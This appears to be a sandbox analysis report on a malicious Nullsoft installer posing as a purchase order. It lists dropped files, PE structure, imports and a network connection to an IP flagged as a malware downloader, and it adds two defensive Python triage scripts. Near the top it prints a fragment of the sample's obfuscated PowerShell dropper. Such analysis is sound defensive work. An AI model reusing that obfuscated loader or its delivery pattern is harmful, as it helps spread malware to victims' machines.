              Preview:$Shammosim=$Udst;<#Lise Yardwand Afkalds Uforanderlighed Elgkernes dimensionerendes #><#Maksimerer Gasslangen Texturing Rupie Dateline Burdensome Tossing #><#Ufleksible Phenomenism Retruse Saften #><#Heliotropical Welwitschia Fornuftgteskaber Outfall #><#Reformulating Nonoptical Undervisningstrinenes dumpoke Descendibility unroyally #><#Dioxinforurenet Svamperummet stubbornness Infamise Unsynchronous Anticipationen #>$Lustering = "Ve,te;,uusb`$ De uODag.rv AniteProjerO.tpolufo,egTharmg Ashie AngrtNsevrsUns b= Vive`$DetalSAntigyCata,gArenae ltinpO dbolUlvere Deb,j ProbeOvercsMo opk KrypoSkjorlNo coeForsrrAntiknFaraoeMissesS.edr;ValraF Reg uProponSidescNaivitRiftiiAnalyo Far,nSkyld OpsumAUventmTannkp UnavyMellexSchooe MorpsLeish Over(mon,r`$Selv,LHie,oeDonergAbor,ePreadmCade.uSuperlR ilbiReg ng,mvekhLsevaeMikrodViride CoatrRade , Spli Skin`$S.ligVAvlskr tetriPe,erkHove n Dropi Te tnSan,fg DisteMou.in IdylsEr,nt Milit=Regio Frems0Decom)borge{Sha,p. Hogc`$reasoG ,erreU,oedaOptegsExulct a
              Process:C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe
              File Type:data
              Category:dropped
              Size (bytes):1598
              Entropy (8bit):4.843429292405709
              Encrypted:false
              SSDEEP:48:1gSbt8NWQp0dLJtexdI6NqPR/VulPF9ZQF:1gtBp0dLCdIPRNulaF
              MD5:A79D55288CA8FC36F756CA2DF78DF7AF
              SHA1:3482E99E8DEE331B3A130CBF0A6120B48FE36BAF
              SHA-256:DF8B4D40703F1C07330641C11C9B89E4F92C51D8A87710C2BCDA193400899E17
              SHA-512:21A0D3EC4785C566D45B9140BD38B71B0FD1A883F48AE065DD57ECA54EFA418054301C2E00545DE324B1799BF1AA3AFFBCDB597498C4DF7AFEBF00E933BD4AF5
              Malicious:false
              Preview:.c../.I......N......j....}.N....O......@5.r....k..5../...<....G....d..............G......1.T................u..........-A*..l.............................J..s....[.%R 3l.........Y-.....O...>....5._....].......4.S................&.F......s..............uK..1.......g..L...0....5}..................}....z^...L.O....o...t..2.7..............{f6....!....Z......................c}................r|................4...........2..q..........~.V....t...%........t.h...5........DL.......w4......m............k.;GY...J..........<..Q......l..'....Z..&.......x.x9........7....O............?....I.......B.K..6...............#.......[.....8.......L..6.......'.$....5.[G.....Y.._f..s.....2y...J.C.NX.....1...6....q......td.9.....9....x........D.`,.....{......e......X....H...~...5.......!...._.w..9.=d.........).............~..............>.....A..y................}q........Y.......2....W.....e ...Z..........9...{P..SY.......f..3...K...A..........p....>..w.}...~..0....F.........e....g....U.........;..x...
              Process:C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe
              File Type:data
              Category:dropped
              Size (bytes):4569
              Entropy (8bit):4.827413411790206
              Encrypted:false
              SSDEEP:96:E52t34LUMB6hUmRFoiL1rEZnfCxuv24pyrPxVR:E52t3yrqUmRFoqdUKuvDpuPxH
              MD5:ACB120BA86F44EC0FA1E60BFCFCFE5C5
              SHA1:3F470AD1363BD721BDA6AF4C79A34CD8A5E94EC1
              SHA-256:7AD2307792118779A5F40C39D2F3047A4D3C0B71FF9E2EA06D2AE124CFF86F86
              SHA-512:1D46B84D9A5E3B5261B093084193A06DAB792E9EEEA18DDD5B7548D74F470C8C13548BDC02FE75937BB8CF83860A217A301DC259D08A7583A28BED5CDDCAF69A
              Malicious:false
              Preview:..M..................*........d....[..D......y.........W...G......................}.......G............`....Sz....k............~R.....................)...%.....Q.......i........M......T.&...+..Q.....5.............S...-;.l..L.4.................v...........B._.....!|.............)...........................5..F...O......).....x...........`.....M..............]..R....T......#........I..............<..O.{y..........F.......y......|.._w..........HT.........SY..........q.AH...............G.%-..........j...e....u...T............w.........K..G..d..<........Gx..@..\p.....M..!....;....)............Q^..............&P.<.I5.{......@......+P...d.................-....8...............U..!.<........m..F.......b...........'......(.$.......q3Z......B...).....[B.......5a........W.......S....o.....}U.........\....i.........@(.../..6..e..P.g....=.).......q...(F....g.,.'....."C..*..................#.k.P...4.%.......(....S.(h.........z....................<................p?..........<...z.....
              Process:C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe
              File Type:TTComp archive data, binary, 4K dictionary
              Category:dropped
              Size (bytes):3873
              Entropy (8bit):4.818261380685794
              Encrypted:false
              SSDEEP:96:NQ+UMIGKiEZMWngpnQX311LVUomcVbmX8Rm:NQRxGdrnQX311edcVa8Rm
              MD5:CBE5F7B0FB52E89B173DEF4DA182E007
              SHA1:1D1ECDB560A6542425A0C0F216520BFC3C54E898
              SHA-256:9D4441F5001396DD8782FB3D760DE020387DA0F89BE435194B322229FC2162BC
              SHA-512:890976074F894804808E906DCCFA027CA7F1940100C3168A559A8C2EB277DA6A5FCDAB3201757B8F20F89BDB892C0F71BA9EFD6EC40B42D2C060611216C4D738
              Malicious:false
              Preview:........`......eL....l.......G...........#."................J...............R....Z.V..?[i..D...@..g.N.........@....................x..............!.........P...........j.......e....%V...h...|....#....j...8......y.......Pd..>.\..5..`j.G............N..........F.p...............V.f........Q..@......zJ Y.....1`.....A..................2....+..".......ki......nB......_.......h.c..**......=..........l.Q.$4.........m.....T....V...t...<Z.....).2...W7R>......f.......(.0.J....tA.{........Yl...k.......................!.As...@w...........rO..E..........K.+........55...\....fC}H...3...........!.....2...'.:..W..)...........'/.+....B......c....[..)..h..W.C..................../........Ts..b.d.r.....CT.........@..../.7Y.L........-......b.v..d.....s...........h...^......................\......./....K...N.....f..S......T....................oi...p.[.b....h...........f...........&........oQ.>...;.......p.....-...0`;.Z.B.K.M..z..Ai.....`..Q.m......\.A.........4......W..2....&.............g&.
              Process:C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe
              File Type:data
              Category:dropped
              Size (bytes):5746
              Entropy (8bit):4.860343313702358
              Encrypted:false
              SSDEEP:96:WC1MtbM/mkZAIw2KMyWFtyiLD8bqMuYFMv3zJQ533TeMWZceVpY:WCabM/mkbKmty2D82SFj5HTeMWTTY
              MD5:F70A8CDCEFEBCC012F6586FCE4610BC8
              SHA1:A51720E46071D068F04761363B6D26D3F79B08D8
              SHA-256:F4C59E08F2ED7D49DA8FFA4726D2823E16513A946F623E3240D190BFE755F541
              SHA-512:4428AE31A366B4E615DE842EA34824632A023B891FE202323A99E9472EF2B8E9FEBA6B19467845BA070BE2CF54F03C2772D938EDD92E85740971A8DB8E040A41
              Malicious:false
              Preview:..1...........U...L...}.......f.....V.X....U..........U'...B.`.........!.....B.....eu...............W...(..........!.........g........................:.....'.R...&..Z..9B...............`.........../....!....B.+.....^.4.....0......h.....C........{.._.w....................#...;...Q...M.....L.........7...............................U.....J..%.....M.........Nt..#............T...VR..^. H..p....4.........c.H7.................C.....N......<..,..r...)....{...C...........)z..B........i.H...........".....m.Y..h...F...|.......0R..).....^.c...!.N....#....}.._)...c.>.._.............+..J.....C......x..%...\..x........Zk....%..#..U..................................'....f...<..................S..5....Q~.............>. ;.T.2&...............]...r.........k..................f.a..Lt...=.........I.X....c...^.............kv.....a"...,....d......&.../.... ..e....@........,p.........U.....t..i....m..................]-......R9.~k..>......9=.)B..#..................p.....i........+.......&.......
              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):6.160427481450352
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:PO Tournefortian2453525525235235623425523235.exe
              File size:876'348 bytes
              MD5:d332bcaa3c61494b774f49bf3e716c21
              SHA1:8cdfa60c6b3f25c7d48753e50c298b746c3386de
              SHA256:d61208c85ce83c279dd87495f0dfc1cf5c345d2bf3a6e739279dcf188e19b21d
              SHA512:40a405252934e0ece7e24514bf041674c84559d94f0791183c77268e154387ac8c452838237c33f55434a3eb04c8f47e818f9d7172cc5295ef9af86e92f80942
              SSDEEP:12288:R3IpD7+TUoYhjjPDU6dK7UVEnNH8nUg1EbV3O9XqOqLI4VpStZB:R3IUwHhjjPVdK7UVEp8nU6C2qOaUB
              TLSH:A615E1A7B91098D0EC29CD728A5FB57406297C27094B964B70A8F70E6FB13036B17DF6
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L...h.Oa.................h....:....
              Icon Hash:060037645d190103
              Entrypoint:0x40350a
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x614F9A68 [Sat Sep 25 21:53:44 2021 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
              Instruction
              push ebp
              mov ebp, esp
              sub esp, 000003F4h
              push ebx
              push esi
              push edi
              push 00000020h
              pop edi
              xor ebx, ebx
              push 00008001h
              mov dword ptr [ebp-14h], ebx
              mov dword ptr [ebp-04h], 0040A2E0h
              mov dword ptr [ebp-10h], ebx
              call dword ptr [004080CCh]
              mov esi, dword ptr [004080D0h]
              lea eax, dword ptr [ebp-00000140h]
              push eax
              mov dword ptr [ebp-0000012Ch], ebx
              mov dword ptr [ebp-2Ch], ebx
              mov dword ptr [ebp-28h], ebx
              mov dword ptr [ebp-00000140h], 0000011Ch
              call esi
              test eax, eax
              jne 00007FB6D4B0CA4Ah
              lea eax, dword ptr [ebp-00000140h]
              mov dword ptr [ebp-00000140h], 00000114h
              push eax
              call esi
              mov ax, word ptr [ebp-0000012Ch]
              mov ecx, dword ptr [ebp-00000112h]
              sub ax, 00000053h
              add ecx, FFFFFFD0h
              neg ax
              sbb eax, eax
              mov byte ptr [ebp-26h], 00000004h
              not eax
              and eax, ecx
              mov word ptr [ebp-2Ch], ax
              cmp dword ptr [ebp-0000013Ch], 0Ah
              jnc 00007FB6D4B0CA1Ah
              and word ptr [ebp-00000132h], 0000h
              mov eax, dword ptr [ebp-00000134h]
              movzx ecx, byte ptr [ebp-00000138h]
              mov dword ptr [007A8B18h], eax
              xor eax, eax
              mov ah, byte ptr [ebp-0000013Ch]
              movzx eax, ax
              or eax, ecx
              xor ecx, ecx
              mov ch, byte ptr [ebp-2Ch]
              movzx ecx, cx
              shl eax, 10h
              or eax, ecx
              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3c5000 | 0x74090 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6670 | 0x6800 | 947cb8a43bf8f4be84b88dc77764312e | False | 0.6679311899038461 | data | 6.436002641218711 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x139a | 0x1400 | 691f0273dad50ec603f6fedf850b58ee | False | 0.45 | data | 5.145774564074664 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x39eb78 | 0x600 | 69d435a1d4e9efa1d5d00d6c3645c91e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x3a9000 | 0x1c000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3c5000 | 0x74090 | 0x74200 | 8811d5f7795ce1cbd4cc3ae013339193 | False | 0.31199332279332614 | data | 3.904771356500897 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
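The section table is where a triage analyst first looks for a mismatch between what the file stores and what it maps: here .data reserves 0x39eb78 bytes in memory while only 0x600 bytes are on disk, .ndata has no raw data at all (its MD5 is that of the empty string, which is normal for the uninitialized section of a Nullsoft installer stub), and the entry point 0x40350a falls inside .text. The script below is an added example and not part of the Joe Sandbox report: the section rows are transcribed from the table above, the entropy of .data is left as None because the report lists it as unknown, and the thresholds (virtual/raw ratio of 8, entropy 7.0) are arbitrary triage defaults, not values from the report.

```python
"""Triage heuristics over a PE section table (added example, not from the report).

SECTIONS is transcribed from the sandbox report's section table. Run the file
to print the flags, or import it and call triage_sections() / section_for_rva().
"""
from typing import NamedTuple, Optional

IMAGE_BASE = 0x400000    # report: Imagebase:0x400000
ENTRY_POINT = 0x40350a   # report: Entrypoint:0x40350a


class Section(NamedTuple):
    name: str
    va: int                   # RVA where the section is mapped
    vsize: int                # bytes reserved in memory
    rawsize: int              # bytes actually stored in the file
    entropy: Optional[float]  # 8-bit entropy of the raw bytes, None if unknown
    chars: frozenset          # IMAGE_SCN_* characteristics


def sec(name, va, vsize, rawsize, entropy, chars):
    return Section(name, va, vsize, rawsize, entropy,
                   frozenset(c.strip() for c in chars.split(",")))


# Transcribed from the report's section table (entropy rounded).
SECTIONS = [
    sec(".text",  0x1000,   0x6670,   0x6800,  6.436, "IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ"),
    sec(".rdata", 0x8000,   0x139a,   0x1400,  5.146, "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ"),
    sec(".data",  0xa000,   0x39eb78, 0x600,   None,  "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE"),
    sec(".ndata", 0x3a9000, 0x1c000,  0x0,     0.0,   "IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE"),
    sec(".rsrc",  0x3c5000, 0x74090,  0x74200, 3.905, "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ"),
]


def triage_sections(sections, vsize_ratio=8, packed_entropy=7.0):
    """Return {section name: [flags]} for every section that deserves a look.

    vsize_ratio and packed_entropy are assumed triage thresholds, not report values.
    """
    flags = {}
    for s in sections:
        notes = []
        if s.rawsize == 0:
            notes.append("no raw data in file (uninitialized section)")
        elif s.vsize > vsize_ratio * s.rawsize:
            notes.append(f"virtual size is {s.vsize // s.rawsize}x raw size; "
                         "memory reserved well beyond what the file stores")
        if {"IMAGE_SCN_MEM_WRITE", "IMAGE_SCN_MEM_EXECUTE"} <= s.chars:
            notes.append("writable and executable")
        if s.entropy is not None and s.entropy >= packed_entropy:
            notes.append(f"entropy {s.entropy:.2f} suggests packed or encrypted content")
        if notes:
            flags[s.name] = notes
    return flags


def section_for_rva(sections, rva):
    """Name of the section whose mapped range contains rva, or None if it is in a gap."""
    for s in sections:
        if s.va <= rva < s.va + max(s.vsize, s.rawsize):
            return s.name
    return None


if __name__ == "__main__":
    for name, notes in triage_sections(SECTIONS).items():
        print(f"{name}: " + "; ".join(notes))
    print("entry point is in", section_for_rva(SECTIONS, ENTRY_POINT - IMAGE_BASE))
```

On this table the only sections flagged are .data (virtual size thousands of times the raw size) and .ndata (no raw data); none of the stored sections reaches the entropy threshold, which is consistent with the report's whole-file entropy of 6.16 and with the packed payload living in dropped files rather than in a high-entropy section of the installer itself.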
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x3c5598 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | United States | 0.26142852915939285
RT_ICON | 0x4075c0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.32470720454276586
RT_ICON | 0x417de8 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.3789415598066008
RT_ICON | 0x421290 | 0x67e8 | Device independent bitmap graphic, 80 x 160 x 32, image size 26560 | English | United States | 0.38169172932330825
RT_ICON | 0x427a78 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.4024029574861368
RT_ICON | 0x42cf00 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.39891355692017005
RT_ICON | 0x431128 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.45736514522821575
RT_ICON | 0x4336d0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.5044559099437148
RT_ICON | 0x434778 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.5381130063965884
RT_ICON | 0x435620 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5717213114754098
RT_ICON | 0x435fa8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.6872743682310469
RT_ICON | 0x436850 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.6111751152073732
RT_ICON | 0x436f18 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.3725609756097561
RT_ICON | 0x437580 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.4436416184971098
RT_ICON | 0x437ae8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6595744680851063
RT_ICON | 0x437f50 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.48118279569892475
RT_ICON | 0x438238 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States | 0.5327868852459017
RT_ICON | 0x438420 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 128 | English | United States | 0.694078947368421
RT_ICON | 0x438550 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5777027027027027
RT_ICON | 0x438678 | 0xb0 | Device independent bitmap graphic, 16 x 32 x 1, image size 64 | English | United States | 0.6590909090909091
RT_DIALOG | 0x438728 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x438828 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x438948 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x438a10 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x438a70 | 0x11e | data | English | United States | 0.5804195804195804
RT_VERSION | 0x438b90 | 0x1bc | data | English | United States | 0.5608108108108109
RT_MANIFEST | 0x438d50 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Imports
ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
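The "Import Hash" reported earlier (56a78d55f3f7af51443e58e0ce2fb5f6) is derived from exactly this import table: the imphash is the MD5 of the string "dll.function,dll.function,..." with every name lowercased, the .dll/.ocx/.sys extension stripped, and entries in the order they appear in the import directory. Because the hash covers only the NSIS stub's imports, every sample built with the same NSIS release shares it, which makes it useful for clustering installers but weak for distinguishing families. The script below is an added example, not code from the report or from Joe Sandbox; it implements the usual imphash normalization over a list transcribed from the table above. Two caveats stated as assumptions: the report does not promise to list functions in their original import-directory order, and USER32 and KERNEL32 are omitted here for brevity, so the value this produces is not expected to match the reported hash; imports by ordinal (which the real algorithm maps to names through a lookup table) are not handled.

```python
"""Import hash (imphash) normalization and computation (added example, not from the report).

IMPORTS is transcribed from the sandbox report's import table. The report does not
guarantee original import order and USER32/KERNEL32 are left out here, so the value
printed is for illustrating the algorithm, not for matching the reported hash.
"""
import hashlib

# Transcribed from the import table above; USER32.dll and KERNEL32.dll omitted for brevity.
IMPORTS = [
    ("ADVAPI32.dll", ["RegCreateKeyExW", "RegEnumKeyW", "RegQueryValueExW", "RegSetValueExW",
                      "RegCloseKey", "RegDeleteValueW", "RegDeleteKeyW", "AdjustTokenPrivileges",
                      "LookupPrivilegeValueW", "OpenProcessToken", "SetFileSecurityW",
                      "RegOpenKeyExW", "RegEnumValueW"]),
    ("SHELL32.dll",  ["SHGetSpecialFolderLocation", "SHFileOperationW", "SHBrowseForFolderW",
                      "SHGetPathFromIDListW", "ShellExecuteExW", "SHGetFileInfoW"]),
    ("ole32.dll",    ["OleInitialize", "OleUninitialize", "CoCreateInstance", "IIDFromString",
                      "CoTaskMemFree"]),
    ("COMCTL32.dll", ["ImageList_Create", "ImageList_Destroy", "ImageList_AddMasked"]),
    ("GDI32.dll",    ["SetBkMode", "SetBkColor", "GetDeviceCaps", "CreateFontIndirectW",
                      "CreateBrushIndirect", "DeleteObject", "SetTextColor", "SelectObject"]),
]

STRIPPED_EXTENSIONS = (".dll", ".ocx", ".sys")


def normalize_import(dll, func):
    """Lowercase both names and drop a .dll/.ocx/.sys extension: 'advapi32.regcreatekeyexw'."""
    name = dll.lower()
    for ext in STRIPPED_EXTENSIONS:
        if name.endswith(ext):
            name = name[: -len(ext)]
            break
    return f"{name}.{func.lower()}"


def imphash_string(imports):
    """The comma-joined string that is actually hashed; order is significant."""
    return ",".join(normalize_import(dll, func) for dll, funcs in imports for func in funcs)


def imphash(imports):
    """MD5 hex digest of the normalized import string."""
    return hashlib.md5(imphash_string(imports).encode("ascii")).hexdigest()


if __name__ == "__main__":
    print(imphash_string(IMPORTS)[:120] + "...")
    print("imphash over the transcribed subset:", imphash(IMPORTS))
    print("same imports, DLLs reversed:", imphash(list(reversed(IMPORTS))))
```

The last two lines of output differ, which is the point worth remembering when pivoting on imphash: two binaries with identical import sets but a different import-directory order hash differently, so a shared imphash implies a shared build toolchain and link order, not merely a shared API surface.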
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-26T23:55:52.759567+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 26, 2024 23:55:51.426534891 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:51.426632881 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:51.426857948 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:51.452259064 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:51.452327013 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:52.146090984 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:52.146343946 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:52.146343946 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:52.181915998 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:52.181955099 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:52.182595968 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:52.183543921 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:52.184777021 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:52.228219032 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:52.759550095 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:52.759596109 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:52.759691954 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:52.759715080 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:52.759820938 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:52.759886980 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.075077057 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.075088024 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.075315952 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.075373888 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.075560093 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.075687885 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.075687885 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.075784922 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
